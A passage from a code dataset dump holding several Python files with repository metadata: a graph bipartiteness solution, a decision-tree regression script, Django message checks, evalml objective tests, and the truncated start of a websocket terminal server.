Dataset schema (column, dtype, observed range):

Column                                      Dtype            Range
hexsha                                      stringlengths    40 – 40
size                                        int64            5 – 2.06M
ext                                         stringclasses    10 values
lang                                        stringclasses    1 value
max_stars_repo_path                         stringlengths    3 – 248
max_stars_repo_name                         stringlengths    5 – 125
max_stars_repo_head_hexsha                  stringlengths    40 – 78
max_stars_repo_licenses                     sequencelengths  1 – 10
max_stars_count                             int64            1 – 191k
max_stars_repo_stars_event_min_datetime     stringlengths    24 – 24
max_stars_repo_stars_event_max_datetime     stringlengths    24 – 24
max_issues_repo_path                        stringlengths    3 – 248
max_issues_repo_name                        stringlengths    5 – 125
max_issues_repo_head_hexsha                 stringlengths    40 – 78
max_issues_repo_licenses                    sequencelengths  1 – 10
max_issues_count                            int64            1 – 67k
max_issues_repo_issues_event_min_datetime   stringlengths    24 – 24
max_issues_repo_issues_event_max_datetime   stringlengths    24 – 24
max_forks_repo_path                         stringlengths    3 – 248
max_forks_repo_name                         stringlengths    5 – 125
max_forks_repo_head_hexsha                  stringlengths    40 – 78
max_forks_repo_licenses                     sequencelengths  1 – 10
max_forks_count                             int64            1 – 105k
max_forks_repo_forks_event_min_datetime     stringlengths    24 – 24
max_forks_repo_forks_event_max_datetime     stringlengths    24 – 24
content                                     stringlengths    5 – 2.06M
avg_line_length                             float64          1 – 1.02M
max_line_length                             int64            3 – 1.03M
alphanum_fraction                           float64          0 – 1
count_classes                               int64            0 – 1.6M
score_classes                               float64          0 – 1
count_generators                            int64            0 – 651k
score_generators                            float64          0 – 1
count_decorators                            int64            0 – 990k
score_decorators                            float64          0 – 1
count_async_functions                       int64            0 – 235k
score_async_functions                       float64          0 – 1
count_documentation                         int64            0 – 1.04M
score_documentation                         float64          0 – 1
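The rows below follow this schema. As a minimal sketch of how the per-file quality scores might be used (this assumes the rows are also available as a Parquet export; the file name "data.parquet" and the 0.5 threshold are illustrative assumptions, not part of this dump):

import pandas as pd

# Minimal sketch, assuming the rows of this dump are available as a Parquet
# export; "data.parquet" is a hypothetical file name.
df = pd.read_parquet("data.parquet")

# Keep files that score highly on the documentation heuristic and inspect a
# few of the metadata columns defined in the schema above.
well_documented = df[(df["lang"] == "Python") & (df["score_documentation"] > 0.5)]
print(well_documented[["max_stars_repo_path", "size", "score_documentation"]].head())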
bea43752768259680c29953a0cec72ec71c5a8eb
1,329
py
Python
code_week12_713_719/is_graph_bipartite_hard.py
dylanlee101/leetcode
b059afdadb83d504e62afd1227107de0b59557af
[ "Apache-2.0" ]
null
null
null
code_week12_713_719/is_graph_bipartite_hard.py
dylanlee101/leetcode
b059afdadb83d504e62afd1227107de0b59557af
[ "Apache-2.0" ]
null
null
null
code_week12_713_719/is_graph_bipartite_hard.py
dylanlee101/leetcode
b059afdadb83d504e62afd1227107de0b59557af
[ "Apache-2.0" ]
null
null
null
'''
Given an undirected graph `graph`, return true if the graph is bipartite.

A graph is bipartite if we can split its set of nodes into two independent
subsets A and B such that every edge in the graph has one node in A and the
other node in B.

graph is given as an adjacency list: graph[i] lists all nodes connected to
node i. Each node is an integer between 0 and graph.length - 1. The graph has
no self-loops and no parallel edges: graph[i] does not contain i, and graph[i]
contains no duplicate values.

Example 1:
Input: [[1,3], [0,2], [1,3], [0,2]]
Output: true
Explanation: the undirected graph is
0----1
|    |
|    |
3----2
We can split the nodes into two groups: {0, 2} and {1, 3}.

Example 2:
Input: [[1,2,3], [0,2], [0,1,3], [0,2]]
Output: false
Explanation: the undirected graph is
0----1
| \  |
|  \ |
3----2
We cannot split the nodes into two independent subsets.

Source: LeetCode (力扣)
Link: https://leetcode-cn.com/problems/is-graph-bipartite
'''
from typing import List  # List is used in the type annotation below


class Solution:
    def isBipartite(self, graph: List[List[int]]) -> bool:
        n = len(graph)
        uncolored, red, green = 0, 1, 2
        color = [uncolored] * n
        valid = True

        # Two-colour the graph via DFS; a colour conflict on any edge means
        # the graph is not bipartite.
        def dfs(node, c):
            nonlocal valid
            color[node] = c
            cNei = (green if c == red else red)
            for neighbor in graph[node]:
                if color[neighbor] == uncolored:
                    dfs(neighbor, cNei)
                    if not valid:
                        return
                elif color[neighbor] != cNei:
                    valid = False
                    return

        for i in range(n):
            if color[i] == uncolored:
                dfs(i, red)
                if not valid:
                    break

        return valid
21.435484
117
0.51392
793
0.446258
0
0
0
0
0
0
980
0.551491
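As a quick illustration (not part of the archived file), the Solution class from this row can be checked against the two examples in its docstring:

# Illustrative usage of the Solution class above; the two inputs are the
# examples from the problem statement.
solver = Solution()
assert solver.isBipartite([[1, 3], [0, 2], [1, 3], [0, 2]]) is True
assert solver.isBipartite([[1, 2, 3], [0, 2], [0, 1, 3], [0, 2]]) is False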
bea493d4dc7e2d4506520e5f797ce4cb0a9a2a6e
1,417
py
Python
data_preprocessing/decision_tree_regression.py
Frost199/Machine_Learning
8cf77c6cbbae7781ac6f2ffcc9218ad79472d287
[ "MIT" ]
null
null
null
data_preprocessing/decision_tree_regression.py
Frost199/Machine_Learning
8cf77c6cbbae7781ac6f2ffcc9218ad79472d287
[ "MIT" ]
null
null
null
data_preprocessing/decision_tree_regression.py
Frost199/Machine_Learning
8cf77c6cbbae7781ac6f2ffcc9218ad79472d287
[ "MIT" ]
1
2020-05-23T16:46:52.000Z
2020-05-23T16:46:52.000Z
# -*- coding: utf-8 -*-
"""
Created on Tue Apr 17 06:44:47 2018

@author: Eleam Emmanuel
"""
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from sklearn.tree import DecisionTreeRegressor

# importing the dataset
dataset = pd.read_csv('Position_Salaries.csv')

# take all the columns but leave the last one(-1)
# always make sure our independent variable is a matrix not a vector and
# dependent variable can be a vector
X = dataset.iloc[:, 1:-1].values
Y = dataset.iloc[:, 2].values

# splitting the dataset into a training set and a test set
# x_train, x_test, y_train, y_test = train_test_split(X, Y, test_size=0.2, random_state=0)

# feature scaling
"""sc_X = StandardScaler()
x_train = sc_X.fit_transform(x_train)
x_test = sc_X.transform(x_test)
sc_Y = StandardScaler()
x_train = sc_X.fit_transform(x_train)"""

# fitting the Decision Tree regression Model to the dataset
regressor = DecisionTreeRegressor(random_state=0)
regressor.fit(X, Y)

# predicting a new result; predict() expects a 2-D array of shape (n_samples, n_features)
y_pred = regressor.predict([[6.5]])

# Visualizing the Decision tree regression result (for higher resolution and smoother curve)
X_grid = np.arange(min(X), max(X), 0.01)
X_grid = X_grid.reshape(len(X_grid), 1)
plt.scatter(X, Y, color='red')
plt.plot(X_grid, regressor.predict(X_grid), color='blue')
plt.title("Truth or Bluff (Regression Model)")
plt.xlabel("Position Level")
plt.ylabel("Salary")
plt.show()
30.804348
92
0.740296
0
0
0
0
0
0
0
0
867
0.611856
bea4e663116d7a61eb7a7e77d69904ecfbbff62c
1,786
py
Python
user_messages/apps.py
everaccountable/django-user-messages
101d539b785bdb440bf166fb16ad25eb66e4174a
[ "MIT" ]
null
null
null
user_messages/apps.py
everaccountable/django-user-messages
101d539b785bdb440bf166fb16ad25eb66e4174a
[ "MIT" ]
null
null
null
user_messages/apps.py
everaccountable/django-user-messages
101d539b785bdb440bf166fb16ad25eb66e4174a
[ "MIT" ]
null
null
null
from django.apps import AppConfig
from django.conf import settings
from django.core import checks
from django.template import engines
from django.template.backends.django import DjangoTemplates
from django.utils.text import capfirst
from django.utils.translation import gettext_lazy as _


@checks.register()
def check_context_processors(app_configs, **kwargs):
    errors = []

    for engine in engines.all():
        if isinstance(engine, DjangoTemplates):
            django_templates_instance = engine.engine
            break
    else:
        django_templates_instance = None

    if django_templates_instance:
        if (
            "django.contrib.messages.context_processors.messages"
            not in django_templates_instance.context_processors
            and "admin.E404" not in settings.SILENCED_SYSTEM_CHECKS
        ):
            errors.append(
                checks.Error(
                    "If using 'user_messages.context_processors.messages'"
                    " instead of the official messages context processor"
                    " you have to add 'admin.E404' to SILENCED_SYSTEM_CHECKS.",
                    id="user_messages.E001",
                )
            )

    if ("admin.E406" not in settings.SILENCED_SYSTEM_CHECKS
            and "django.contrib.messages" not in settings.INSTALLED_APPS):
        errors.append(
            checks.Error(
                "If using 'user_messages' instead of django.contrib.messages"
                " you have to add 'admin.E406' to SILENCED_SYSTEM_CHECKS.",
                id="user_messages.E002",
            )
        )

    return errors


class UserMessagesConfig(AppConfig):
    default_auto_field = "django.db.models.AutoField"
    name = "user_messages"
    verbose_name = capfirst(_("user messages"))
33.698113
79
0.647816
165
0.092385
0
0
1,327
0.743001
0
0
484
0.270997
bea518b5d7670e7d0f948f9ce8eda34d0fa0bd36
20,671
py
Python
evalml/tests/objective_tests/test_standard_metrics.py
sharshofski/evalml
f13dcd969e86b72ba01ca520247a16850030dcb0
[ "BSD-3-Clause" ]
null
null
null
evalml/tests/objective_tests/test_standard_metrics.py
sharshofski/evalml
f13dcd969e86b72ba01ca520247a16850030dcb0
[ "BSD-3-Clause" ]
null
null
null
evalml/tests/objective_tests/test_standard_metrics.py
sharshofski/evalml
f13dcd969e86b72ba01ca520247a16850030dcb0
[ "BSD-3-Clause" ]
null
null
null
from itertools import product import numpy as np import pandas as pd import pytest from sklearn.metrics import matthews_corrcoef as sk_matthews_corrcoef from evalml.objectives import ( F1, MAPE, MSE, AccuracyBinary, AccuracyMulticlass, BalancedAccuracyBinary, BalancedAccuracyMulticlass, BinaryClassificationObjective, CostBenefitMatrix, ExpVariance, F1Macro, F1Micro, F1Weighted, LogLossBinary, MCCBinary, MCCMulticlass, MeanSquaredLogError, Precision, PrecisionMacro, PrecisionMicro, PrecisionWeighted, Recall, RecallMacro, RecallMicro, RecallWeighted, RootMeanSquaredError, RootMeanSquaredLogError ) from evalml.objectives.utils import ( _all_objectives_dict, get_non_core_objectives ) EPS = 1e-5 all_automl_objectives = _all_objectives_dict() all_automl_objectives = {name: class_() for name, class_ in all_automl_objectives.items() if class_ not in get_non_core_objectives()} def test_input_contains_nan(): y_predicted = np.array([np.nan, 0, 0]) y_true = np.array([1, 2, 1]) for objective in all_automl_objectives.values(): with pytest.raises(ValueError, match="y_predicted contains NaN or infinity"): objective.score(y_true, y_predicted) y_true = np.array([np.nan, 0, 0]) y_predicted = np.array([1, 2, 0]) for objective in all_automl_objectives.values(): with pytest.raises(ValueError, match="y_true contains NaN or infinity"): objective.score(y_true, y_predicted) y_true = np.array([1, 0]) y_predicted_proba = np.array([[1, np.nan], [0.1, 0]]) for objective in all_automl_objectives.values(): if objective.score_needs_proba: with pytest.raises(ValueError, match="y_predicted contains NaN or infinity"): objective.score(y_true, y_predicted_proba) def test_input_contains_inf(): y_predicted = np.array([np.inf, 0, 0]) y_true = np.array([1, 0, 0]) for objective in all_automl_objectives.values(): with pytest.raises(ValueError, match="y_predicted contains NaN or infinity"): objective.score(y_true, y_predicted) y_true = np.array([np.inf, 0, 0]) y_predicted = np.array([1, 0, 0]) for objective in all_automl_objectives.values(): with pytest.raises(ValueError, match="y_true contains NaN or infinity"): objective.score(y_true, y_predicted) y_true = np.array([1, 0]) y_predicted_proba = np.array([[1, np.inf], [0.1, 0]]) for objective in all_automl_objectives.values(): if objective.score_needs_proba: with pytest.raises(ValueError, match="y_predicted contains NaN or infinity"): objective.score(y_true, y_predicted_proba) def test_different_input_lengths(): y_predicted = np.array([0, 0]) y_true = np.array([1]) for objective in all_automl_objectives.values(): with pytest.raises(ValueError, match="Inputs have mismatched dimensions"): objective.score(y_true, y_predicted) y_true = np.array([0, 0]) y_predicted = np.array([1, 2, 0]) for objective in all_automl_objectives.values(): with pytest.raises(ValueError, match="Inputs have mismatched dimensions"): objective.score(y_true, y_predicted) def test_zero_input_lengths(): y_predicted = np.array([]) y_true = np.array([]) for objective in all_automl_objectives.values(): with pytest.raises(ValueError, match="Length of inputs is 0"): objective.score(y_true, y_predicted) def test_probabilities_not_in_0_1_range(): y_predicted = np.array([0.3, 1.001, 0.3]) y_true = np.array([1, 0, 1]) for objective in all_automl_objectives.values(): if objective.score_needs_proba: with pytest.raises(ValueError, match="y_predicted contains probability estimates"): objective.score(y_true, y_predicted) y_predicted = np.array([0.3, -0.001, 0.3]) y_true = np.array([1, 0, 1]) for objective in 
all_automl_objectives.values(): if objective.score_needs_proba: with pytest.raises(ValueError, match="y_predicted contains probability estimates"): objective.score(y_true, y_predicted) y_true = np.array([1, 0]) y_predicted_proba = np.array([[1, 3], [0.1, 0]]) for objective in all_automl_objectives.values(): if objective.score_needs_proba: with pytest.raises(ValueError, match="y_predicted contains probability estimates"): objective.score(y_true, y_predicted_proba) def test_negative_with_log(): y_predicted = np.array([-1, 10, 30]) y_true = np.array([-1, 0, 1]) for objective in [MeanSquaredLogError(), RootMeanSquaredLogError()]: with pytest.raises(ValueError, match="Mean Squared Logarithmic Error cannot be used when targets contain negative values."): objective.score(y_true, y_predicted) def test_binary_more_than_two_unique_values(): y_predicted = np.array([0, 1, 2]) y_true = np.array([1, 0, 1]) for objective in all_automl_objectives.values(): if isinstance(objective, BinaryClassificationObjective) and not objective.score_needs_proba: with pytest.raises(ValueError, match="y_predicted contains more than two unique values"): objective.score(y_true, y_predicted) y_true = np.array([0, 1, 2]) y_predicted = np.array([1, 0, 1]) for objective in all_automl_objectives.values(): if isinstance(objective, BinaryClassificationObjective) and not objective.score_needs_proba: with pytest.raises(ValueError, match="y_true contains more than two unique values"): objective.score(y_true, y_predicted) def test_accuracy_binary(): obj = AccuracyBinary() assert obj.score(np.array([0, 0, 1, 1]), np.array([1, 1, 0, 0])) == pytest.approx(0.0, EPS) assert obj.score(np.array([0, 0, 1, 1]), np.array([0, 1, 0, 1])) == pytest.approx(0.5, EPS) assert obj.score(np.array([0, 0, 1, 1]), np.array([0, 0, 1, 1])) == pytest.approx(1.0, EPS) def test_accuracy_multi(): obj = AccuracyMulticlass() assert obj.score(np.array([0, 0, 1, 1]), np.array([1, 1, 0, 0])) == pytest.approx(0.0, EPS) assert obj.score(np.array([0, 0, 1, 1]), np.array([0, 1, 0, 1])) == pytest.approx(0.5, EPS) assert obj.score(np.array([0, 0, 1, 1]), np.array([0, 0, 1, 1])) == pytest.approx(1.0, EPS) assert obj.score(np.array([0, 0, 1, 1, 2, 2]), np.array([0, 0, 0, 0, 0, 0])) == pytest.approx(1 / 3.0, EPS) assert obj.score(np.array([0, 0, 0, 0, 0, 0]), np.array([0, 0, 1, 1, 2, 2])) == pytest.approx(1 / 3.0, EPS) def test_balanced_accuracy_binary(): obj = BalancedAccuracyBinary() assert obj.score(np.array([0, 1, 0, 0, 1, 0]), np.array([0, 1, 0, 0, 0, 1])) == pytest.approx(0.625, EPS) assert obj.score(np.array([0, 1, 0, 0, 1, 0]), np.array([0, 1, 0, 0, 1, 0])) == pytest.approx(1.0, EPS) assert obj.score(np.array([0, 1, 0, 0, 1, 0]), np.array([1, 0, 1, 1, 0, 1])) == pytest.approx(0.0, EPS) def test_balanced_accuracy_multi(): obj = BalancedAccuracyMulticlass() assert obj.score(np.array([0, 1, 2, 0, 1, 2, 3]), np.array([0, 0, 2, 0, 0, 2, 3])) == pytest.approx(0.75, EPS) assert obj.score(np.array([0, 1, 2, 0, 1, 2, 3]), np.array([0, 1, 2, 0, 1, 2, 3])) == pytest.approx(1.0, EPS) assert obj.score(np.array([0, 1, 2, 0, 1, 2, 3]), np.array([1, 0, 3, 1, 2, 1, 0])) == pytest.approx(0.0, EPS) def test_f1_binary(): obj = F1() assert obj.score(np.array([0, 1, 0, 0, 1, 0]), np.array([0, 1, 0, 0, 0, 1])) == pytest.approx(0.5, EPS) assert obj.score(np.array([0, 1, 0, 0, 1, 1]), np.array([0, 1, 0, 0, 1, 1])) == pytest.approx(1.0, EPS) assert obj.score(np.array([0, 0, 0, 0, 1, 0]), np.array([0, 1, 0, 0, 0, 1])) == pytest.approx(0.0, EPS) assert obj.score(np.array([0, 0]), np.array([0, 
0])) == pytest.approx(0.0, EPS) def test_f1_micro_multi(): obj = F1Micro() assert obj.score(np.array([0, 0, 0, 0, 0, 0, 0, 0, 0]), np.array([0, 0, 0, 1, 1, 1, 2, 2, 2])) == pytest.approx(1 / 3.0, EPS) assert obj.score(np.array([0, 0, 0, 1, 1, 1, 2, 2, 2]), np.array([0, 0, 0, 1, 1, 1, 2, 2, 2])) == pytest.approx(1.0, EPS) assert obj.score(np.array([2, 2, 2, 0, 0, 0, 1, 1, 1]), np.array([0, 0, 0, 1, 1, 1, 2, 2, 2])) == pytest.approx(0.0, EPS) assert obj.score(np.array([1, 2]), np.array([0, 0])) == pytest.approx(0.0, EPS) def test_f1_macro_multi(): obj = F1Macro() assert obj.score(np.array([0, 0, 0, 0, 0, 0, 0, 0, 0]), np.array([0, 0, 0, 1, 1, 1, 2, 2, 2])) \ == pytest.approx(2 * (1 / 3.0) * (1 / 9.0) / (1 / 3.0 + 1 / 9.0), EPS) assert obj.score(np.array([0, 0, 0, 1, 1, 1, 2, 2, 2]), np.array([0, 0, 0, 1, 1, 1, 2, 2, 2])) == pytest.approx(1.0, EPS) assert obj.score(np.array([2, 2, 2, 0, 0, 0, 1, 1, 1]), np.array([0, 0, 0, 1, 1, 1, 2, 2, 2])) == pytest.approx(0.0, EPS) assert obj.score(np.array([1, 2]), np.array([0, 0])) == pytest.approx(0.0, EPS) def test_f1_weighted_multi(): obj = F1Weighted() assert obj.score(np.array([0, 0, 0, 1, 1, 1, 2, 2, 2]), np.array([0, 0, 0, 0, 0, 0, 0, 0, 0])) \ == pytest.approx(2 * (1 / 3.0) * (1 / 9.0) / (1 / 3.0 + 1 / 9.0), EPS) assert obj.score(np.array([0, 0, 0, 1, 1, 1, 2, 2, 2]), np.array([0, 0, 0, 1, 1, 1, 2, 2, 2])) == pytest.approx(1.0, EPS) assert obj.score(np.array([0, 0, 0, 1, 1, 1, 2, 2, 2]), np.array([2, 2, 2, 0, 0, 0, 1, 1, 1])) == pytest.approx(0.0, EPS) assert obj.score(np.array([0, 0]), np.array([1, 2])) == pytest.approx(0.0, EPS) def test_precision_binary(): obj = Precision() assert obj.score(np.array([1, 1, 1, 1, 1, 1]), np.array([0, 0, 0, 1, 1, 1])) == pytest.approx(1.0, EPS) assert obj.score(np.array([0, 0, 0, 1, 1, 1]), np.array([1, 1, 1, 1, 1, 1])) == pytest.approx(0.5, EPS) assert obj.score(np.array([0, 0, 0, 0, 0, 0]), np.array([1, 1, 1, 1, 1, 1])) == pytest.approx(0.0, EPS) assert obj.score(np.array([0, 0, 0, 0, 0, 0]), np.array([0, 0, 0, 0, 0, 0])) == pytest.approx(0.0, EPS) def test_precision_micro_multi(): obj = PrecisionMicro() assert obj.score(np.array([0, 0, 0, 1, 1, 1, 2, 2, 2]), np.array([0, 0, 0, 0, 0, 0, 0, 0, 0])) == pytest.approx(1 / 3.0, EPS) assert obj.score(np.array([0, 0, 0, 1, 1, 1, 2, 2, 2]), np.array([0, 0, 0, 1, 1, 1, 2, 2, 2])) == pytest.approx(1.0, EPS) assert obj.score(np.array([0, 0, 0, 1, 1, 1, 2, 2, 2]), np.array([2, 2, 2, 0, 0, 0, 1, 1, 1])) == pytest.approx(0.0, EPS) assert obj.score(np.array([0, 0]), np.array([1, 2])) == pytest.approx(0.0, EPS) def test_precision_macro_multi(): obj = PrecisionMacro() assert obj.score(np.array([0, 0, 0, 1, 1, 1, 2, 2, 2]), np.array([0, 0, 0, 0, 0, 0, 0, 0, 0])) == pytest.approx(1 / 9.0, EPS) assert obj.score(np.array([0, 0, 0, 1, 1, 1, 2, 2, 2]), np.array([0, 0, 0, 1, 1, 1, 2, 2, 2])) == pytest.approx(1.0, EPS) assert obj.score(np.array([0, 0, 0, 1, 1, 1, 2, 2, 2]), np.array([2, 2, 2, 0, 0, 0, 1, 1, 1])) == pytest.approx(0.0, EPS) assert obj.score(np.array([0, 0]), np.array([1, 2])) == pytest.approx(0.0, EPS) def test_precision_weighted_multi(): obj = PrecisionWeighted() assert obj.score(np.array([0, 0, 0, 1, 1, 1, 2, 2, 2]), np.array([0, 0, 0, 0, 0, 0, 0, 0, 0])) == pytest.approx(1 / 9.0, EPS) assert obj.score(np.array([0, 0, 0, 1, 1, 1, 2, 2, 2]), np.array([0, 0, 0, 1, 1, 1, 2, 2, 2])) == pytest.approx(1.0, EPS) assert obj.score(np.array([0, 0, 0, 1, 1, 1, 2, 2, 2]), np.array([2, 2, 2, 0, 0, 0, 1, 1, 1])) == pytest.approx(0.0, EPS) assert obj.score(np.array([0, 0]), 
np.array([1, 2])) == pytest.approx(0.0, EPS) def test_recall_binary(): obj = Recall() assert obj.score(np.array([0, 0, 0, 1, 1, 1]), np.array([1, 1, 1, 1, 1, 1])) == pytest.approx(1.0, EPS) assert obj.score(np.array([0, 0, 0, 1, 1, 1]), np.array([0, 0, 0, 0, 0, 0])) == pytest.approx(0.0, EPS) assert obj.score(np.array([1, 1, 1, 1, 1, 1]), np.array([0, 0, 0, 1, 1, 1])) == pytest.approx(0.5, EPS) def test_recall_micro_multi(): obj = RecallMicro() assert obj.score(np.array([0, 0, 0, 1, 1, 1, 2, 2, 2]), np.array([0, 0, 0, 0, 0, 0, 0, 0, 0])) == pytest.approx(1 / 3.0, EPS) assert obj.score(np.array([0, 0, 0, 1, 1, 1, 2, 2, 2]), np.array([0, 0, 0, 1, 1, 1, 2, 2, 2])) == pytest.approx(1.0, EPS) assert obj.score(np.array([0, 0, 0, 1, 1, 1, 2, 2, 2]), np.array([2, 2, 2, 0, 0, 0, 1, 1, 1])) == pytest.approx(0.0, EPS) assert obj.score(np.array([0, 0]), np.array([1, 2])) == pytest.approx(0.0, EPS) def test_recall_macro_multi(): obj = RecallMacro() assert obj.score(np.array([0, 0, 0, 1, 1, 1, 2, 2, 2]), np.array([0, 0, 0, 0, 0, 0, 0, 0, 0])) == pytest.approx(1 / 3.0, EPS) assert obj.score(np.array([0, 0, 0, 1, 1, 1, 2, 2, 2]), np.array([0, 0, 0, 1, 1, 1, 2, 2, 2])) == pytest.approx(1.0, EPS) assert obj.score(np.array([0, 0, 0, 1, 1, 1, 2, 2, 2]), np.array([2, 2, 2, 0, 0, 0, 1, 1, 1])) == pytest.approx(0.0, EPS) assert obj.score(np.array([0, 0]), np.array([1, 2])) == pytest.approx(0.0, EPS) def test_recall_weighted_multi(): obj = RecallWeighted() assert obj.score(np.array([0, 0, 0, 1, 1, 1, 2, 2, 2]), np.array([0, 0, 0, 0, 0, 0, 0, 0, 0])) == pytest.approx(1 / 3.0, EPS) assert obj.score(np.array([0, 0, 0, 1, 1, 1, 2, 2, 2]), np.array([0, 0, 0, 1, 1, 1, 2, 2, 2])) == pytest.approx(1.0, EPS) assert obj.score(np.array([0, 0, 0, 1, 1, 1, 2, 2, 2]), np.array([2, 2, 2, 0, 0, 0, 1, 1, 1])) == pytest.approx(0.0, EPS) assert obj.score(np.array([0, 0]), np.array([1, 2])) == pytest.approx(0.0, EPS) def test_log_linear_model(): obj = MeanSquaredLogError() root_obj = RootMeanSquaredLogError() s1_predicted = np.array([0, 0, 0, 1, 1, 1, 2, 2, 2]) s1_actual = np.array([0, 0, 0, 0, 0, 0, 0, 0, 0]) s2_predicted = np.array([0, 0, 0, 1, 1, 1, 2, 2, 2]) s2_actual = np.array([0, 0, 0, 1, 1, 1, 2, 2, 2]) s3_predicted = np.array([0, 0, 0, 1, 1, 1, 2, 2, 2]) s3_actual = np.array([2, 2, 2, 0, 0, 0, 1, 1, 1]) assert obj.score(s1_predicted, s1_actual) == pytest.approx(0.562467324910) assert obj.score(s2_predicted, s2_actual) == pytest.approx(0) assert obj.score(s3_predicted, s3_actual) == pytest.approx(0.617267976207983) assert root_obj.score(s1_predicted, s1_actual) == pytest.approx(np.sqrt(0.562467324910)) assert root_obj.score(s2_predicted, s2_actual) == pytest.approx(0) assert root_obj.score(s3_predicted, s3_actual) == pytest.approx(np.sqrt(0.617267976207983)) def test_mse_linear_model(): obj = MSE() root_obj = RootMeanSquaredError() s1_predicted = np.array([0, 0, 0, 1, 1, 1, 2, 2, 2]) s1_actual = np.array([0, 0, 0, 0, 0, 0, 0, 0, 0]) s2_predicted = np.array([0, 0, 0, 1, 1, 1, 2, 2, 2]) s2_actual = np.array([0, 0, 0, 1, 1, 1, 2, 2, 2]) s3_predicted = np.array([0, 0, 0, 1, 1, 1, 2, 2, 2]) s3_actual = np.array([2, 2, 2, 0, 0, 0, 1, 1, 1]) assert obj.score(s1_predicted, s1_actual) == pytest.approx(5. / 3.) assert obj.score(s2_predicted, s2_actual) == pytest.approx(0) assert obj.score(s3_predicted, s3_actual) == pytest.approx(2.) assert root_obj.score(s1_predicted, s1_actual) == pytest.approx(np.sqrt(5. 
/ 3.)) assert root_obj.score(s2_predicted, s2_actual) == pytest.approx(0) assert root_obj.score(s3_predicted, s3_actual) == pytest.approx(np.sqrt(2.)) def test_mcc_catches_warnings(): y_true = [1, 0, 1, 1] y_predicted = [0, 0, 0, 0] with pytest.warns(RuntimeWarning) as record: sk_matthews_corrcoef(y_true, y_predicted) assert "invalid value" in str(record[-1].message) with pytest.warns(None) as record: MCCBinary().objective_function(y_true, y_predicted) MCCMulticlass().objective_function(y_true, y_predicted) assert len(record) == 0 def test_mape_time_series_model(): obj = MAPE() s1_actual = np.array([0, 0, 1, 1, 1, 1, 2, 0, 2]) s1_predicted = np.array([0, 1, 0, 1, 1, 2, 1, 2, 0]) s2_actual = np.array([-1, -2, 1, 3]) s2_predicted = np.array([1, 2, -1, -3]) s3_actual = np.array([1, 2, 4, 2, 1, 2]) s3_predicted = np.array([0, 2, 2, 1, 3, 2]) with pytest.raises(ValueError, match="Mean Absolute Percentage Error cannot be used when targets contain the value 0."): obj.score(s1_actual, s1_predicted) assert obj.score(s2_actual, s2_predicted) == pytest.approx(8 / 4 * 100) assert obj.score(s3_actual, s3_predicted) == pytest.approx(4 / 6 * 100) assert obj.score(pd.Series(s3_actual, index=range(-12, -6)), s3_predicted) == pytest.approx(4 / 6 * 100) assert obj.score(pd.Series(s2_actual, index=range(10, 14)), pd.Series(s2_predicted, index=range(20, 24))) == pytest.approx(8 / 4 * 100) @pytest.mark.parametrize("objective_class", _all_objectives_dict().values()) def test_calculate_percent_difference(objective_class): score = 5 reference_score = 10 change = ((-1) ** (not objective_class.greater_is_better) * (score - reference_score)) / reference_score answer = 100 * change assert objective_class.calculate_percent_difference(score, reference_score) == answer assert objective_class.perfect_score is not None @pytest.mark.parametrize("objective_class,nan_value", product(_all_objectives_dict().values(), [None, np.nan])) def test_calculate_percent_difference_with_nan(objective_class, nan_value): assert pd.isna(objective_class.calculate_percent_difference(nan_value, 2)) assert pd.isna(objective_class.calculate_percent_difference(-1, nan_value)) assert pd.isna(objective_class.calculate_percent_difference(nan_value, nan_value)) assert pd.isna(objective_class.calculate_percent_difference(2, 0)) def test_calculate_percent_difference_negative_and_equal_numbers(): assert CostBenefitMatrix.calculate_percent_difference(score=5, baseline_score=5) == 0 assert CostBenefitMatrix.calculate_percent_difference(score=-5, baseline_score=-10) == 50 assert CostBenefitMatrix.calculate_percent_difference(score=-10, baseline_score=-5) == -100 assert CostBenefitMatrix.calculate_percent_difference(score=-5, baseline_score=10) == -150 assert CostBenefitMatrix.calculate_percent_difference(score=10, baseline_score=-5) == 300 # These values are not possible for LogLossBinary but we need them for 100% coverage # We might add an objective where lower is better that can take negative values in the future assert LogLossBinary.calculate_percent_difference(score=-5, baseline_score=-10) == -50 assert LogLossBinary.calculate_percent_difference(score=-10, baseline_score=-5) == 100 assert LogLossBinary.calculate_percent_difference(score=-5, baseline_score=10) == 150 assert LogLossBinary.calculate_percent_difference(score=10, baseline_score=-5) == -300 def test_calculate_percent_difference_small(): expected_value = 100 * -1 * np.abs(1e-9 / (1e-9)) assert np.isclose(ExpVariance.calculate_percent_difference(score=0, baseline_score=1e-9), expected_value, 
atol=1e-8) assert pd.isna(ExpVariance.calculate_percent_difference(score=0, baseline_score=1e-10)) assert pd.isna(ExpVariance.calculate_percent_difference(score=1e-9, baseline_score=0)) assert pd.isna(ExpVariance.calculate_percent_difference(score=0, baseline_score=0))
40.771203
133
0.592473
0
0
0
0
957
0.046297
0
0
940
0.045474
bea66694bcf52b9fffd500768ba31f40d22d16ce
4,908
py
Python
server-python3/server.py
Aaron-Ming/websocket_terminal
42c24391d51c275eabf1f879fb312b9a3614f51e
[ "MIT" ]
40
2016-11-20T09:48:27.000Z
2021-04-02T00:29:14.000Z
server-python3/server.py
Aaron-Ming/websocket_terminal
42c24391d51c275eabf1f879fb312b9a3614f51e
[ "MIT" ]
6
2018-01-07T03:43:22.000Z
2022-03-21T08:43:33.000Z
server-python3/server.py
glensc/websocket_terminal
42c24391d51c275eabf1f879fb312b9a3614f51e
[ "MIT" ]
20
2016-12-02T06:00:27.000Z
2021-08-15T11:40:34.000Z
import os import urllib.parse import eventlet import eventlet.green.socket # eventlet.monkey_patch() import eventlet.websocket import eventlet.wsgi import wspty.pipe from flask import Flask, request, redirect from wspty.EchoTerminal import EchoTerminal from wspty.EncodedTerminal import EncodedTerminal from wspty.WebsocketBinding import WebsocketBinding import config def make_app(): app = Flask(__name__) app.static_folder = get_static_folder() print("Serving static files from: " + app.static_folder) @app.route('/') def index(): newurl = b'/static/index.html' if request.query_string: newurl = newurl + b'?' + request.query_string return redirect(newurl) return app def parse_query(qstr): return {k: v[0] for k, v in urllib.parse.parse_qs(qstr).items()} def debug(s): app.logger.debug(s) class TerminalFactory: def __init__(self, args_dict, allow_unsafe=False): self.kind = args_dict['kind'] self.hostname = args_dict.get('hostname', 'localhost') self.port = int(args_dict.get('port', '22')) self.username = args_dict.get('username') self.password = args_dict.get('password') self.term = args_dict.get('term') self.encoding = args_dict.get('encoding', 'utf8') self.allow_unsafe = allow_unsafe def create_binary(self): if self.kind == 'ssh': from wspty.SshTerminal import SshTerminal return SshTerminal( self.hostname, self.port, self.username, self.password, self.term ) if self.kind == 'raw': from 